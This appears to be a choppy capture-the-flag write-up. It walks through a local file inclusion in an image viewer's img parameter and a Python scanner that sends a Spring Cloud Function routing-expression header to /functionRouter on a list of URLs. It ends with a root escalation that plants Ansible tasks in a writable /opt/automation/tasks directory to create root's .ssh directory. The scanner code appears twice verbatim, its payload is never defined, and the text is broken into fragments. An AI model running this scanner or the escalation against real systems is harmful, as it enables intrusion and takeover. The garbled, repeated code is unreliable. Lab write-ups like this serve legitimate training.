We have an upload functionality in the web app and it accepts PNG files, although there are some bypasses but they didn’t lead anywhere.
Once you upload a valid PNG/Image file, you can view it by going to show_image and the filename is specified by the img parameter
It is vulnerable to LFI vulnerability, we can access any arbitrary file with the known location.
After some hefty enumeration, we can see the absolute path for the webapp by checking the webapp.service this filename was retrieved from the /opt/automation/tasks/playbook_1.yml during initial enumeration, as giving the a directory location will list out the sub-directories and it’s associated files:
Checking the service files, we can get the location of the jar file of the webserver.
[Unit] Description=Spring WEb APP After=syslog.target
data ='test' headers = { 'spring.cloud.function.routing-expression':payload, 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } path = '/functionRouter' f = open(txt) urllist=f.readlines()
for url in urllist : url = url.strip('\n') all = url + path try: req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) code =req.status_code text = req.text rsp = '"error":"Internal Server Error"'
if code == 500and rsp in text: print ( f'[+] { url } is vulnerable' ) poc_file = open('vulnerable.txt', 'a+') poc_file.write(url + '\n') poc_file.close() else: print ( f'[-] { url } not vulnerable' )
data ='test' headers = { 'spring.cloud.function.routing-expression':payload, 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } path = '/functionRouter' f = open(txt) urllist=f.readlines()
for url in urllist : url = url.strip('\n') all = url + path try: req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) code =req.status_code text = req.text rsp = '"error":"Internal Server Error"'
if code == 500and rsp in text: print ( f'[+] { url } is vulnerable' ) poc_file = open('vulnerable.txt', 'a+') poc_file.write(url + '\n') poc_file.close() else: print ( f'[-] { url } not vulnerable' )
Further looking into the writable folder and files, we can see that /opt/automation/tasks is writable by staff group member and paul is a member of that group.
That directory had an ansible playbook file for automating tasks
From the enumeration, we were able to anticipate that any tasks created in this directory will be executed, hence to replicate it, I created two tasks,
This is for creating an .ssh directory is root home directory